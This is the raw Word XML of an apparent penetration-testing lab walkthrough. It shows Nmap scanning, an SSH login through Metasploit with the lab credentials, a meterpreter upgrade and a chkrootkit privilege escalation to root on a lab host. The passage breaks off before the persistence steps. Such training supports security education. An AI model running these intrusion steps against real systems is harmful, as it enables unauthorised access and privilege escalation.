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F1FA4" w14:textId="1A883761" w:rsidR="00853ABF" w:rsidRDefault="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve">Establishing Persistence </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>On</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> Linux</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D581B17" w14:textId="77777777" w:rsidR="007F0989" w:rsidRDefault="007F0989"/>
    <w:p w14:paraId="44C5EE4D" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7853D17E" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>In this lab, the target server is running a vulnerable Rootkit Scanner. This lab covers the process of establishing persistence on Linux with Metasploit. The target machine will be accessible at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4298C097" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F0989">
        <w:t> Escalate to the root user on the target machine and retrieve the flag!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79213765" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSH Login Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A571608" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve">| Username | Password | | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>jackie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> | password |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D97714" w14:textId="77777777" w:rsidR="007F0989" w:rsidRDefault="007F0989"/>
    <w:p w14:paraId="17FBBFF3" w14:textId="199A1FC7" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D7AA58" w14:textId="77777777" w:rsidR="007F0989" w:rsidRDefault="007F0989"/>
    <w:p w14:paraId="7CAF87E7" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F0989">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FD9E67" w14:textId="6D6BE79C" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BAA363C" wp14:editId="0D26D637">
            <wp:extent cx="5943600" cy="3343910"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1557478949" name="Picture 24"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40B2CE6D" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F0989">
        <w:t> Check if the target machine is reachable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A612ED" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C30D415" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve">ping -c 4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0844F622" w14:textId="5B57EA51" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56C513F2" wp14:editId="12C5CFE5">
            <wp:extent cx="5766096" cy="2527430"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="17022329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32955" name="Picture 1702232955"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5766096" cy="2527430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A33B49" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>The target is reachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09263D8F" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F0989">
        <w:t> Port scanning with Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1448DB" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve">We can now perform a default Nmap port scan on the target to identify the open ports on the target </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>system,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> this can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743BABFC" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3041C5C1" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="664C4378" w14:textId="352A6084" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35C588C3" wp14:editId="70A4F8A4">
            <wp:extent cx="5835950" cy="2444876"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1303976835" name="Picture 2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76835" name="Picture 26" descr="A screen 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835950" cy="2444876"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C541F1" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F0989">
        <w:t> Gaining Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287F6AE2" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve">To save time, the target system can be accessed via SSH using the credentials </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>jackie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve">/password. We can authenticate with the target via SSH using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>ssh_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> Metasploit module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3419A6" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:lastRenderedPageBreak/>
        <w:t>To use this module, we will need to start up the Metasploit Framework Console (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>), this can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C8BBF6" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DFB139" w14:textId="2DCF46CB" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="007F0989">
        <w:t>sfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5145FE35" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>use auxiliary/scanner/ssh/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>ssh_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05362B52" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0A28AA21" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve">set USERNAME </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>jackie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="55137673" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve">set PASSWORD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66B3F809" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213F5E71" w14:textId="5DB438E8" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65F7F1EC" wp14:editId="12F38457">
            <wp:extent cx="5816899" cy="3314870"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17005748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74830" name="Picture 1700574830"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5816899" cy="3314870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1716E17B" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>Now that we have gained access to the Linux target system, we can explore the process of clearing our tracks on the Linux target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D4E9A6" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve">We can upgrade this command shell session to a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> session by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A146775" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD1F1C1" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>sessions -u 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40347BDD" w14:textId="1CA35AD6" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41E088E7" wp14:editId="6A353F8B">
            <wp:extent cx="5791498" cy="1835244"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1234335728" name="Picture 2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35728" name="Picture 28" descr="A screen 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91498" cy="1835244"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3880A5C7" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F0989">
        <w:t> Establishing persistence on Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A648AA0" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>To use the Metasploit persistence modules, we will first need to elevate our privileges on the Linux target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E26F2F8" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve">The target system has a vulnerable version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> installed that is vulnerable to privilege escalation and can be exploited </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>through the use of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> a Metasploit module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7743DB93" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>We can load the module by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014B7B2F" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C17963" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="645AB776" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>We will now need to configure the module options, more specifically, we will need to set the SESSION ID option. This can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073D0FC6" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C92D39B" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>set SESSION 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CCAF62" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>Note: In your case, the SESSION ID will be different.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427126C8" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve">We will also need to set the path to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> binary, this can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E99AE1" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E76382" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>set CHKROOTKIT /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04E14DCB" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>Now</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> LHOST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527216DF" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE456B4" w14:textId="7ABC130B" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve">set LHOST </w:t>
      </w:r>
      <w:r w:rsidR="000A1634">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="000A1634" w:rsidRPr="000A1634">
        <w:t>92.155.231.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDF3499" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:lastRenderedPageBreak/>
        <w:t>After configuring the module options, we can execute the module by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF19923" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8CBF76" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4199F380" w14:textId="15841EE1" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="000A1634" w:rsidP="007F0989">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08A166A6" wp14:editId="132638CA">
            <wp:extent cx="5753396" cy="3911801"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="164038012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80128" name="Picture 29"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5753396" cy="3911801"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1F42FA" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>As shown in the following screenshot, the module runs successfully and provides us with an elevated command shell session on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C59439E" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve">We can also upgrade this command shell session to a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
